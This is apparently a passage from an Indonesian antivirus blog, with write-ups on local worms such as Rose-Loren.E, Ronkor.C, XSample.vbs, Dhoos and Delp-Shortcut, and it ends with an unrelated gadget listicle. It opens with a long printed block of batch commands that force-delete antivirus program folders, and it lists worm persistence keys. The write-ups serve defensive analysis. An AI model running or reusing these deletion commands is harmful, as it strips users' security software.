    del /f /q /s /a:h  C:\norton~2\*.* >nul
    del /f /q /s /a:h  C:\pav\*.* >nul
    del /f /q /s /a:h  C:\pccill~1\*.* >nul
    del /f /q /s /a:h  C:\pc-cil~1\*.* >nul
    del /f /q /s /a:h  C:\iolo\*.* >nul
    del /f /q /s /a:h  C:\progra~1\ESET\*.* >nul
    del /f /q /s /a:h  C:\progra~1\antivi~1\*.* >nul
    del /f /q /s /a:h  C:\progra~1\antivi~2\*.* >nul
    del /f /q /s /a:h  C:\progra~1\avg\*.* >nul
    del /f /q /s /a:h  C:\progra~1\kasper~1\*.* >nul
    del /f /q /s /a:h  C:\progra~1\kasper~2\*.* >nul
    del /f /q /s /a:h  C:\progra~1\mcafee\*.* >nul
    del /f /q /s /a:h  C:\progra~1\mcafee.com\agent\*.* >nul
    del /f /q /s /a:h  C:\progra~1\mcafee.com\*.* >nul
    del /f /q /s /a:h  C:\progra~1\mcafee.com\VSO\*.* >nul
    del /f /q /s /a:h  C:\progra~1\mcafee~1\*.* >nul
    del /f /q /s /a:h  C:\progra~1\mindso~1\*.* >nul
    del /f /q /s /a:h  C:\progra~1\norman\*.* >nul
    del /f /q /s /a:h  C:\progra~1\norton~1\*.* >nul
    del /f /q /s /a:h  C:\progra~1\norton~2\*.* >nul
    del /f /q /s /a:h  C:\progra~1\pandas~1\*.* >nul
    del /f /q /s /a:h  C:\Progra~1\Alwils~1\*.* >nul
    del /f /q /s /a:h  C:\progra~1\iolo\*.* >nul
    del /f /q /s /a:R  C:\ESET\*.* >nul
    del /f /q /s /a:R  C:\antivi~1\*.* >nul
    del /f /q /s /a:R  C:\antivi~2\*.* >nul
    del /f /q /s /a:R  C:\antiviru\*.* >nul
    del /f /q /s /a:R  C:\avg\*.* >nul
    del /f /q /s /a:R  C:\kasper~1\*.* >nul
    del /f /q /s /a:R  C:\kasper~2\*.* >nul
    del /f /q /s /a:R  C:\mcafee\*.* >nul
    del /f /q /s /a:R  C:\mcafee.com\agent\*.* >nul
    del /f /q /s /a:R  C:\mcafee.com\*.* >nul
    del /f /q /s /a:R  C:\mcafee.com\VSO\*.* >nul
    del /f /q /s /a:R  C:\mcafee~1\*.* >nul
    del /f /q /s /a:R  C:\msav\*.* >nul
    del /f /q /s /a:R  C:\norman\*.* >nul
    del /f /q /s /a:R  C:\norton~1\*.* >nul
    del /f /q /s /a:R  C:\norton~2\*.* >nul
    del /f /q /s /a:R  C:\pav\*.* >nul
    del /f /q /s /a:R  C:\pccill~1\*.* >nul
    del /f /q /s /a:R  C:\pc-cil~1\*.* >nul
    del /f /q /s /a:R  C:\iolo\*.* >nul
    del /f /q /s /a:R  C:\progra~1\ESET\*.* >nul
    del /f /q /s /a:R  C:\progra~1\antivi~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\antivi~2\*.* >nul
    del /f /q /s /a:R  C:\progra~1\avg\*.* >nul
    del /f /q /s /a:R  C:\progra~1\kasper~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\kasper~2\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mcafee\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mcafee.com\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mcafee.com\agent\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mcafee.com\VSO\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mcafee~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mindso~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\norman\*.* >nul
    del /f /q /s /a:R  C:\progra~1\norton~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\norton~2\*.* >nul
    del /f /q /s /a:R  C:\progra~1\pandas~1\*.* >nul
    del /f /q /s /a:R  C:\Progra~1\Alwils~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\iolo\*.* >nul
  • Jika ditemukan folder WinRar pada folder Program Files, maka Rose-Loren akan langsung mengcopykan file data.exe data.exe dan file gambar rose.jpg.
    Rose-Loren.E - Image Rose
  • Membuat file dengan nama private.zip yang isinya file worm dengan nama data.exe pada setiap drive termasuk di flash disk.
  • Membuat file dengan nama myrose.html, dan di dalamnya tersisip pesan berupa puisi cinta yang akan terlihat jika membuka code htmlnya.Rose-Loren.E - HTMLRose-Loren.E - View Source
  • Merubah icon pada flash disk karena adanya file autorun.inf serta file desktop.ini yang merubah background flash disk menjadi bunga mawar. Yang berbeda adalah, biasanya, autorun.inf lebih berfungsi untuk memanggil file companion dari malware yang ada di flash disk, sedangkan Rose-Loren hanya membuat autorun untuk merubah icon flash disk.Rose-Loren.E - Flash DiskRose-Loren.E - Autorun
D. Hasil Infeksi
Worm ini banyak melakukan perubahan pada registry, terlihat pada Legal Notification sebelum tampilan logon screen yang selalu berubah ubah karena Rose-Loren.E melakukan random terhadap kalimat yang di injeksikan ke registry. Sebagai contoh adalah gambar ini:
Rose-Loren.E - Logon
Text yang dirandom adalah:
  • Ambillah waktu untuk belajar, itu adalah sumber kebijaksanaan.
  • Hiduplah seperti lilin menerangi orang lain, janganlah hidup seperti duri menusuk diri dan menyakiti orang lain
  • Mahkota kemanusiaan ialah rendah hati
  • Yang telah berlalu biarkan ia berlalu, yang mendatang hadapi dengan cemerlang
  • Kawan sejati ialah orang yang mencintaimu meskipun telah mengenalmu dengan sebenar-benarnya yaitu baik dan burukmu
  • Sabar adalah jalan keluar bagi orang yang tidak bisa menemukan jalan keluar.
  • Seekor burung di tangan lebih baik daripada sepuluh ekor di atas pohon.
  • Hidup ini adalah warna-warni yang tergores pada kanvas, walaupun tidak cantik ia tetap mempunyai sejuta makna
  • Sebelum memberi nasihat kepada manusia dengan ucapanmu, berilah mereka nasihat dengan perbuatanmu.
  • Harta yang paling menguntungkan ialah SABAR. Teman yang paling akrab adalah AMAL.
  • Pengawal peribadi yang paling waspada DIAM. Bahasa yang paling manis SENYUM. Dan ibadah yang paling indah tentunya KHUSYUK.
  • Apabila kepercayaan telah hilang lenyap, kehormatan telah musnah, maka matilah orang itu -Whittier
  • Jangan sekali-kali kita meremehkan sesuatu perbuatan baik walaupun hanya sekadar senyuman.
  • Anda bukan apa yang anda fikirkan tentang anda, tetapi apa yang anda fikirkan itulah anda
  • Ambillah waktu untuk berdoa, itu adalah sumber ketenangan.
  • Hidup tak selalunya indah tapi yang indah itu tetap hidup dalam kenangan.
  • Biarpun jalan itu panjang, kita akan merintisnya perlahan-lahan.
  • Berfikir sejenak, merenung masa lalu adalah awal yang baik untuk bertindak
  • Dalam kerendahan hati ada ketinggian budi. Dalam kemiskinan harta ada kekayaan jiwa. Dalam kesempitan hidup ada kekuasaan ilmu.
  • Kegagalan dalam kemuliaan lebih baik daripada kejayaan dalam kehinaan.
  • Seseorang yang melakukan kesalahan dan tidak membetulkannya, Sesungguhnya Ia telah melakukan satu kesalahan lagi. – Confucius
  • Ambillah waktu untuk bermain, itu adalah rahsia dari masa muda yang abadi.
  • Selemah-lemah manusia ialah orang yg tak bisa mencari sahabat dan orang yang lebih lemah dari itu ialah orang yg mensia-siakan sahabat yg telah dicari (Saidia Ali)
  • Ambillah waktu untuk berfikir, itu adalah sumber kekuatan.
  • Ambillah waktu untuk mencintai dan dicintai, itu adalah hak istimewa yang diberikan Tuhan.
  • Ambillah waktu untuk bersahabat, itu adalah jalan menuju kebahagiaan.
  • Ambillah waktu untuk tertawa, itu adalah musik yang menggetarkan hati.
  • Ambillah waktu untuk memberi, itu adalah membuat hidup terasa bererti.
  • Ambillah waktu untuk bekerja, itu adalah nilai keberhasilan.
  • Ambillah waktu untuk beramal, itu adalah kunci menuju syurga.
  • Cinta tidak berupa tatapan satu sama lain, tetapi memandang ke luar bersama ke arah yang sama.
  • Persahabatan sering berakhir dengan cinta Tetapi cinta tidak pernah berakhir dengan persahabatan
  • Cobalah bernalar tentang cinta dan engkau pun akan kehilangan nalarmu
  • Jangan pernah bilang ‘Cinta’ kalau kamu tidak perduli.
  • Jangan pernah menyentuh hidup seseorang kalau hal itu akan melukai hatinya.
  • Jangan pernah menatap matanya kalau semua yang kamu lakukan hanya berbohong.
Worm juga menghilangkan beberapa menu pada Folder Options.
Rose-Loren.E - Folder Options
Payload lainnya adalah merubah tampilan properties pada My Computers.
Rose-Loren.E - System
Beberapa registry juga diubah, termasuk mendisable beberapa sistem Windows.
  • Regedit.exe
  • Msconfig.exe
  • taskmgr.exe
  • ntvdm.exe
  • rstrui.exe
  • EnableExtensions
  • FolderContentsInfoTip
  • NoRun
  • NoFind
  • DisableCurrentUserRun
  • HideFileExt
  • FolderSizeTip
  • ShowFullPathAddress
  • ShowFullPath
  • Disable SafeMode
  • Disable Show Hidden and Super Hidden files.
     Worm juga akan membuat startup dengan nama WinUp dan RsWin.
Ronkor.C
February 21st, 2011

Ronkor.C. Ronkor merupakan salah satu worm lokal yang variannya masih dilaporkan oleh pengguna, saat ini telah mencapai 3 varian yang ditemukan.  Seperti juga pada beberapa worm lokal lainnya, curhatan diekspresikan melalui puisi.

A. Info Malware
Nama: Ronkor.C
Asal: Indonesia
Ukuran File: 140 KB (143.360 bytes)
Packer : ~
Pemrograman : Visual Basic
Icon : Folder
Tipe : Worm
B. Tentang Malware
Dengan icon menyerupai folder, worm ini berusaha memanfaatkan kelengahan pengguna yang mengira file worm tersebut folder dan mengkliknya. Ditambah lagi dengan nama file worm yang mengundang rasa penasaran, antara lain:
- Game XXX FrewWare.exe
- McAfee_Antivirus_Pro_final.exe
- Puisi bagus.exe
- Poto hot.exe, dan seterusnya.
C. Companion/File yang dibuat
Saat aktif, worm akan mencari setiap drive yang ditemukan dan membuat file/folder antara lain sebagai berikut:
  • Data <user account>.exe pada tiap root drive, di mana <user account> adalah nama user yang sedang login.
  • Folder dengan nama r0nk0r pada drive harddisk.
  • Folder 51r0nk0r pada removable drive seperti flash disk.
  • File dengan nama Folder.htt di dalam folder 51r0nk0r pada removable disk.
  • File Empty.pif yang diletakkan pada Startup.
  • File dengan lokasi di Windows\r0nk0r.exe.
  • File dengan lokasi di Windows\r0nk0r.vbs.jpg.
  • File dengan lokasi di Windows\setup.exe.
  • File dengan lokasi di Windows\system32\IEXplorer.exe.
  • File dengan lokasi di Windows\system32\MrHello.scr.
  • File dengan lokasi di Windows\system32\shell.exe.
  • File C:\puisiku.txt. Jika dibuka dengan text editor seperti NotePad, akan terlihat seperti pada gambar di atas. Perhatikan informasi tanggal dan waktu yang tertera di bagian bawah teks merupakan tanggal dan waktu hasil generate berdasarkan sistem komputer.
D. Hasil Infeksi
Satu hal yang perlu dicatat dari worm ini adalah teknik pertahanannya yang cukup ketat guna melindungi dirinya dari berbagai tools dan antivirus.  Antara lain menutup aplikasi tertentu yang dijalankan, seperti Task Manager, Regedit, Process Explorer, dan berbagai antivirus yang dikenali berdasarkan string tertentu yang disimpan pada tubuh worm.
Worm ini juga memiliki kemampuan membuat duplikat worm dengan memodifikasi nama file dengan ekstensi *.exe yang dijalankan pengguna.  Misalnya pengguna menjalankan aplikasi bernama abc.exe, maka worm dapat membuat file duplikat worm dengan abc .exe (terdapat spasi sebelum .exe),  sementara file abc.exe yang asli di- hidden. Perbedaan file asli dan file worm terlihat seperti pada gambar berikut, yang diambil dari Command Prompt dengan perintah dir /a.
Ronkor.C
Di memory, worm menjalankan beberapa proses worm dengan nama antara lain:
  • r0nk0r.exe
  • IExplorer.exe
  • WINLOGON.exe
  • SERVICES.exe       

XSample.vbs: Aku Berhasil Masuk Ke Komputer Kamu

February 11th, 2011 admin Leave a comment Go to comments
XSample.vbs
XSample.vbs. Gambar di atas adalah salah satu hasil infeksi dari salah satu malware yang kami dapatkan dengan nama XSample.vbs. Worm ini menggunakan rekayasa sosial yang cukup menarik, yaitu dengan menggunakan nama FreeJAV.com_Hot-Student.avi akan membuat beberapa user mengabaikannya atau malah menjalankannya. Dan hasilnya adalah file tersebut tidak akan bisa di putar layaknya file video karena file tersebut adalah file VBS.

A. Info File
Nama Worm : XSample.vbs
Asal : Indonesia
Ukuran File : 17.1 KB (17,564 bytes)
Packer : ~
Pemrograman : VBScript
Icon : AVI
Tipe : Worm
B. About Malware
Seakan mengikuti tren malware tipe worm saat ini, XSample.vbs juga banyak membuat shortcut. Akan tetapi yang menarik adalah justru bukan shortcut yang dibuatnya, melainkan penyamaran yang digunakan oleh worm ini. Pada dasarnya worm ini hanyalah memotong beberapa line codenya yang setelah diteliti lebih jauh adalah line code yang biasa dijadikan signature atau teknik pendeteksian secara heuristik untuk file VBS oleh beberapa antivirus. Sebagai contoh seperti yang terlihat pada gambar di bawah ini.
XSample.vbs
Jarang sekali teknik pemotongan line code yang kemudian di panggil kembali digunakan oleh malware tipe worm yang dibuat dengan menggunakan bahasa pemrograman VBScript. Selain itu, dengan menggunakan parameter //E:VBSCript yang sama seperti Serviks.vbs.B yaitu membuat wscript.exe tetap menjalankan file vbs meskipun tidak berekstensi *.vbs. Penggunaan parameter ini adalah untuk mejalankan malware yang dihasilkan dengan ekstensi .AVI. Rekayasa sosial yang digunakan adalah dengan membawa kata-kata yang mengandung unsur pornografi.
C. Companion/File yang dibuat
Worm XSample.vbs mengcopykan hostnya ke folder Windows dan membuat autorun di setiap drive. Selain itu membuat shortcut pada desktop dengan nama:
  • Int3rn3t Xpl0r3r.lnk
  • L0g 0ff C0mput3r.lnk
  • R3st4T C0mput3r.lnk
  • Turn 0ff C0mput3R.lnk
Membuat folder dengan nama “RECYCLER” di tiap drive yanbg ditemui, dan di dalamnya juga terdapat folder dengan nama “um4K-r3tupm0K-3K-ku54M-l154hr3B-uk4” yang jika diperhatikan membentuk sebuah kalimat :
um4K-r3tupm0K-3K-ku54M-l154hr3B-uk4
4ku-B3rh451l-M45uk-K3-K0mput3r-K4mu
Aku Berhasil Masuk Ke Komputer Kamu

Worm ini juga membuat folder dengan nama “? Smad-Lock (Brankas Smadav) ?” yang di dalamnya terdapat file dengan nama Read Me.txt dan berisi pesan dari malware :
XSample.vbs
Pesan XSample.vbs juga ditunjukkan melalui sebuah file dengan nama “Kedatanganku – X-5ampl3.mp3” dan bukan benar-benar file MP3 melaikan file Text dan isinya adalah :
XSample.vbs
D. Hasil Infeksi
Tidak terlalu banyak registry yang dirubah oleh XSample.vbs, tetapi payload yang dibuatnya cukup merepotkan user yang terinfeksi malware ini.
  • Mendisable File dengan nama seperti:
    1. 123.exe
    2. 12345.exe
    3. 123456.exe
    4. abc.exe
    5. abcd.exe
    6. cmd.exe
    7. install.exe
    8. msconfig.exe
    9. mspaint.exe
    10. notepad.exe
    11. notepad++.exe
    12. PCMAV.exe
    13. processexplorer.exe
    14. processhacker.exe
    15. regedit.exe
    16. regedt32.exe
    17. RegistryEditor.exe
    18. SbieCtrl.exe
    19. setup.exe
    20. Smadav.exe
    21. taskmgr.exe
    22. vmware-vmx.exe
  • Mengcopykan file FreeJAV.com_Hot-Student.avi ke Folder Windows
  • Membuat Startup dengan nama Drives:
  • 1
    2
    HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Drives
    wscripT.exe //E:VBScripT C:\WINDOWS\FreeJAV.com_Hot-Student.avi
  • Disable beberapa fungsi windows:
    1. Turn Off
    2. Log Off
    3. Run Command
    4. Search
    5. File Associate
    6. MSI Installer
    7. Limit System Restore dan disable Sysem Restore
  • Merubah nama Properties pada My Computer
  • XSample.vbs
  • Merubah Nama Internet Explorer menjadi:
  • XSample.vbs
  • Membuat file shortcut pengganti untuk Shutdown, Restart, dan Log Off.
  • XSample.vbs
  • Menghapus salah satu key pada registry yang berfungsi untuk membedakan file shortcut dan yang bukan shorcut. Sehingga hasilnya adalah tanda panah ka atas pada file shortcut menjadi hilang.
  • Membuat File shortcut dengan nama yang bisa menipu user.
  • XSample.vbs
  • Jika mouse di arahkan ke dalam folder RECYCER, maka akan ada pesan sepert gambar di bawah ini.

Dhoos: Cara Berbisnis Worm

February 2nd, 2011 admin Leave a comment Go to comments
Dhoos

Dhoos.  Biasanya malware berniat untuk merusak komputer korban/mendapat informasi tertentu, akan tetapi hal ini sedikit berbeda dengan worm bernama Dhoos ini. Meskipun beberapa kebiasaan malware yang memanfaatkan website adalah mendownload file tertentu, worm Dhoos hanya seolah menawarkan beberapa produk yang bisa di beli secara online. Meskipun website yang di akses menggunakan bahasa China.

A. File Info

Nama: Dhoos
Asal: China
Ukuran File: 79.3 KB (81,245 bytes)
Packer: UPX
Pemrograman: Delphi
Icon: Folder
Tipe: Worm
Dibuat Dengan Delphi
B. Tentang Malware
Properties
Namanya di ambil dari bagian tubuhnya yang banyak menyebutkan Dhoos. Ukuran asli worm ini jika tanpa packer adalah 528 KB (540,672 bytes). Diduga worm ini mulai menyebar di Indonesia pada awal Januari 2011, akan tetapi beberapa antivirus sudah mampu mengenali worm ini dengan teknik heuristic-nya termasuk PCMAV. Meskipun demikian, ada saja user yang komputernya terinfeksi worm Dhoos kemudia mengirimkan sampelnya kepada kami. Pada komputer yang belum menginstall Windows Asian Language akan menyebabkan nama file worm seperti sebuah karakter acak.

C. Companion/File yang dibuat

  • Setelah aktif, worm ini akan membuat 4 buah shortcut URL pada desktop dan semuanya mengarah pada wesite : http://www.sfc***.com/
Shortcut
  • Disetiap driver terdapat file dari worm dengan nama My Documamts.exe.
  • Membuat file DLL dengan nama BOSC pada folder
    C:\Program Files\Common Files\BOSC.dll.
  • Membuat folder pada dengan “VSPS” pada drive C:\ dan membuat pula companion dengan nama VSPS.exe.
  • Membuat folder dengan nama acak seperti “gqyjwihwwn” dan “qloyaagnml” yang didalamnya terdapa host dari worm dengan nama “explorer.exe” sedangkan yang satunya adalah “smss.exe”.
  • Tidak membuat startup pada registry, worm ini mengcopykan companionnya ke folder startup
    C:\Documents and Settings\All Users\Start Menu\Programs\Startup\liyfmphhgv.exe.
D. Hasil Infeksi
Tidak tanggung-tangung worm ini belokan fungsi 187 file aplikasi dengan nama tertentu ke fungsi “ntsd –d”. 187 nama file yang tidak bisa di buka adalah:
1.~.exe
2.360rpt.exe
3.360Safe.exe
4.360safebox.exe
5.360sd.exe
6.360sdrun.exe
7.360tray.exe
8.799d.exe
9.adam.exe
10.AgentSvr.exe
11.AntiU.exe
12.AoYun.exe
13.appdllman.exe
14.AppSvc32.exe
15.ArSwp.exe
16.ArSwp2.exe
17.ArSwp3.exe
18.AST.exe
19.atpup.exe
20.auto.exe
21.AutoRun.exe
22.autoruns.exe
23.av.exe
24.AvastU3.exe
25.avconsol.exe
26.avgrssvc.exe
27.AvMonitor.exe
28.avp.com
29.avp.exe
30.AvU3Launcher.exe
31.CCenter.exe
32.ccSvcHst.exe
33.cross.exe
34.Discovery.exe
35.DSMain.exe
36.EGHOST.exe
37.FileDsty.exe
38.filmst.exe
39.FTCleanerShell.exe
40.FYFireWall.exe
41.ghost.exe
42.guangd.exe
43.HijackThis.exe
44.IceSword.exe
45.iparmo.exe
46.Iparmor.exe
47.irsetup.exe
48.isPwdSvc.exe
49.jisu.exe
50.kabaload.exe
51.KaScrScn.SCR
52.KASMain.exe
53.KASTask.exe
54.KAV32.exe
55.KAVDX.exe
56.KAVPF.exe
57.KAVPFW.exe
58.KAVSetup.exe
59.kavstart.exe
60.kernelwind32.exe
61.KISLnchr.exe
62.kissvc.exe
63.KMailMon.exe
64.KMFilter.exe
65.knsd.exe
66.knsdave.exe
67.knsdtray.exe
68.KPFW32.exe
69.KPFW32X.exe
70.KPfwSvc.exe
71.KRegEx.exe
72.KRepair.com
73.KsLoader.exe
74.KSWebShield.exe
75.KVCenter.kxp
76.KvDetect.exe
77.KvfwMcl.exe
78.KVMonXP.kxp
79.KVMonXP_1.kxp
80.kvol.exe
81.kvolself.exe
82.KvReport.kxp
83.KVScan.kxp
84.KVSrvXP.exe
85.KVStub.kxp
86.kvupload.exe
87.kvwsc.exe
88.KvXP.kxp
89.KvXP_1.kxp
90.KWatch.exe
91.KWatch9x.exe
92.KWatchX.exe
93.KWSMain.exe
94.kwstray.exe
95.KWSUpd.exe
96.loaddll.exe
97.logogo.exe
98.MagicSet.exe
99.mcconsol.exe
100.mmqczj.exe
101.mmsk.exe
102.Navapsvc.exe
103.Navapw32.exe
104.NAVSetup.exe
105.niu.exe
106.nod32.exe
107.nod32krn.exe
108.nod32kui.exe
109.NPFMntor.exe
110.pagefile.exe
111.pagefile.pif
112.pfserver.exe
113.PFW.exe
114.PFWLiveUpdate.exe
115.qheart.exe
116.QHSET.exe
117.QQDoctor.exe
118.QQDoctorMain.exe
119.QQDoctorRtp.exe
120.QQKav.exe
121.QQPCMgr.exe
122.QQPCRTP.exe
123.QQPCSmashFile.exe
124.QQPCTray.exe
125.QQSC.exe
126.qsetup.exe
127.Ras.exe
128.Rav.exe
129.ravcopy.exe
130.RavMon.exe
131.RavMonD.exe
132.RavStub.exe
133.RavTask.exe
134.RegClean.exe
135.rfwcfg.exe
136.rfwmain.exe
137.rfwProxy.exe
138.rfwsrv.exe
139.RsAgent.exe
140.Rsaupd.exe
141.rsnetsvr.exe
142.RsTray.exe
143.rstrui.exe
144.runiep.exe
145.safeboxTray.exe
146.safelive.exe
147.scan32.exe
148.ScanFrm.exe
149.ScanU3.exe
150.SDGames.exe
151.SelfUpdate.exe
152.servet.exe
153.shcfg32.exe
154.SmartUp.exe
155.sos.exe
156.SREng.EXE
157.SREngPS.EXE
158.stormii.exe
159.sxgame.exe
160.symlcsvc.exe
161.SysSafe.exe
162.tmp.exe
163.TNT.Exe
164.TrojanDetector.exe
165.Trojanwall.exe
166.TrojDie.kxp
167.TxoMoU.Exe
168.UFO.exe
169.UIHost.exe
170.UmxAgent.exe
171.UmxAttachment.exe
172.UmxCfg.exe
173.UmxFwHlp.exe
174.UmxPol.exe
175.upiea.exe
176.UpLive.exe
177.USBCleaner.exe
178.vsstat.exe
179.wbapp.exe
180.webscanx.exe
181.WoptiClean.exe
182.Wsyscheck.exe
183.XDelBox.exe
184.XP.exe
185.zhudongfangyu.exe
186.zjb.exe
187.zxsweep.exe
Memiliki kemampuan Rootkit yang bersembunyi pada Explorer.exe.
Rootkit
Dan ini adalah aktivitas worm yang terlihat pada Process Explorer:
Process Explorer
Karena worm ini membuat user mengakses web dengan bahasa China, maka setiap membuka browser Internet Explorer, maka akan muncul peringatan untuk menginstall paket “Chinese Simplified” terlebih dahulu:
Installation Pack
Untuk flash disk yang sudah terhubung dengan komputer yang terinfeksi maka smua foldernya akan di hidden dan digantikan dengan file worm.

Delp-Shortcut: Meneruskan Tren Serangan Shortcut

January 24th, 2011 admin
Delp-Shortcut

Delp-Shortcut. Rupanya teror worm yang mengeksploitasi shortcut belum berakhir meskipun tahun 2010 telah dilewati. Kami mendapat banyaknya laporan dari user mengenai adanya file shorcut yang tidak bisa di hapus dan ada file mencurigakan dengan nama mso.sys.
A. File Info
Nama: Delp-Shortcut
Asal: Brazil (masih dugaan)
Ukuran File: 25.5 KB (26,112 bytes)
Packer: UPX
Pemrograman: Delphi
Icon: Menyerupai system file
Tipe: Worm
B. Tentang Malware
Bebeda dengan kerabat dekatnya yaitu VB-Shorcut yang juga mengeksploitasi shortcut, worm Delp-Shortcut dibuat menggunakan Delphi. Dengan menggunakan ekstensi *.sys, worm yang sebenarnya adalah file DLL32, mampu menyebar begitu cepat dengan bantuan shortcut yang diciptakannya. Agar bisa berjalan di memory, worm ini akan menempel pada file Run32dll.exe.
Delp-Shortcut
Kami menduga worm ini berasal dari Brazil, karena Delp-Shortcut mencoba mengakses sebuah alamat IP melalui port 1036, yang jika di trace berasal dari Brazil . Walau tidak tertutup kemungkinan IP tersebut hanyalah IP dari domain / hosting yang sengaja dibuat oleh virus maker-nya dan kebetulan berada di Brazil.
IP Delp-Shortcut

C. Companion/File yang dibuat

Delp-shortcut akan membuat 5 buah file shortcut dengan nama Documment and Settings.lnk, Program Files. lnk, RECYCLER.lnk, System Volume Information.lnk dan WINDOWS.lnk seperti yang terlihat pada gambar di atas. Shortcut yang diciptakan worm ini hanya menginfeksi Drive C, D, E, F, dan G.
Shortcut Worm 1
Shortcut Worm 2
Shortcut Worm 3
Shortcut Worm 4
Shortcut Worm 5
Selain itu semua file shortcut yang dibuat akan mengarah kepada file mso.sys yang kemudian mengaktifkan Run32DLL.exe agar bisa berjalan di memory.
Proses Worm
D. Hasil Infeksi

Beberapa kali kami mendapatkan Delp-Shortcut mencoba membuat hang explorer.exe setelah mengakses IP yang sudah di jelaskan di atas. Agar bisa berjalan saat startup, worm ini membuat Startup pada registry dan membuat companion dengan nama Microsoft Update.lnk di folder Startup.
MS Config
Selain itu, companion dari malware ini juga terdapat pada folder:
• C:\Documents and Settings\-ede\Favorites\Microsoft update.lnk
• C:\Documents and Settings\All Users\Start Menu\Internet Explorer.lnk

gadget unik

Perkembangan dunia teknologi makin maju saja tampaknya...
Ada yangg sebagian serius menciptakan alat ato teknologi baru...
Ada pula yangg sebagian membuat teknologi dengan cara yang unik dan penuh rasa humor...

Bukan teknologi kalo tanpa manfaat..so cek this out!
1. Grassy charging station

The Grassy Lawn Charging Station menggunakan rumput sintetis untuk bantalan kamera , smartphone, atau iPod ketika mereka sedang di-charge. Kabel tersembunyi dengan rapi di bawah rumput2 sintetis in. Harganya cuma 25...dollar

2. POLICE! CHEESE

Kalo biasanya polisi di barat bilang FREEZE.........nah kalo ini bilang CHEESE..
Kenapa? Karena pistol diatas ternyata adalah kamera digital.Ini bukan pistol 9mm! Tapi 16 mm 'Still-Image Camera'. Perusahaan Jepang Doryu Camera Company membuat Doryu 2-16 dari 1954 sampai 1956, menurut Camerapedia. Agar makin mirip dengan pistol aslinya, digunakan peluru magnesium lalu anda tinggal rahkan dan tembak. Bahkan bakal ada suara DOR ketika ditembakan.

3. Playstation Massage Sistem

Pernah lagi main PS trus si mbok bilang......"Le....Pijitin pundak mbok dong?"
Nah alat diatas bisa meneruskan kegemaran kita tanpa jadi anak durhaka.Hehehhe
Soalnya dengan kontroler ps yg unik ini, elo-elo pada bisa mijet org sambil kontrol PSnya skalian.

4. EyeSeeCam

Alat diatas bisa menggerakkan bola mata robot sesuai dengan gerakan bola mata kita.Just for fun aja Guys

5. LedUmbrela

Nah kalo malem-malem ujan, mati lampu, kilat dimana-mana...Sekarang tak perlu takut kegelapan....Gunakan ini. Serasa jadi Kamer Rider Black RX.....Pedang Matahari....Ciattt

6. Lawnmower Robot

Ini robot bisa motong rumput dengan kontrol dari PDA.Mahal cuy,5300 dolar....

7. Solar Bikini

Buat para bikiniers(halah opo kuwi)penggemar bikini, saatnya membawa listrik kemanapun...Dengan bikini ini anda bisa ngecarge HP, Iphone, Nyalain Tv, Nyuci pake mesin cuci, Masak Nasi, Nyetrum badan anda sendiri........hahaha...brcanda

8. Self-propelled Suitcase

Di bandara kehabisan troli? Ga masalah tinggal tarik manggggg.Ga mau narik. Nih koper bisa jalan sendiri, soalnya koper ini bsa jalan sendiri gan dengan kecepatan 3mil/jam. Tapi awas kalo kalian kalah lari ma si koper, barang melayang

9. Beauty and the geek jeans

Malu dibilang CUPU? Malu dibilang KUTU BUSUK eh KUTU BUKU? Sekarang ga lagi.Pakai jeans ini n bawa Mac address...eh Mac Laptop.....Pasti ga jadi CUPU.Knpa?
Karena jeans dilengkapi dengan usb wireless yg bsa connect ke komp loe-loe pada. Ada qwerty keyboardnya juga lho. Setelah itu statusmu berubah dari GEEK ke WEIRD(cz sibuk mencetin celana sendiri)

10. LCD belt buckle

Bingung ga ad tipi atawa TV? Nah pake sabuk ini aja.Dengan sabuk ini loe bsa nonton film dimanapun (Walapun agak ribet yah harus lepas sabuk dulu ) LCD nya beresolusi 320-by-240-pixel display dan mensupport .mp4, .avi, .jpg, dan bmp files dari SD cards, dengan kapasitas maksimum 2GB.

11. Spy camera pen

Pulpen2 kamera kaya di film2 james bond ternyata beneran ada lho.Pulpen ini dilengkapi dengan lithium battery yang bisa dicharge dengan usb port, dan dapat merekam video sampe maksimum 2GB.

12. Warming Gloves

Kedinginan?Mending disetrum aja.....Eh maksudnya sarung tangannya.Colokin ke USB.....maka taraaaaa...Hangatlah tanganmu. Kalo gw yg ga gmpang kedinginan ini mending bwat ngangetin bakpao ato kue2 kesukaan gw.......hahaha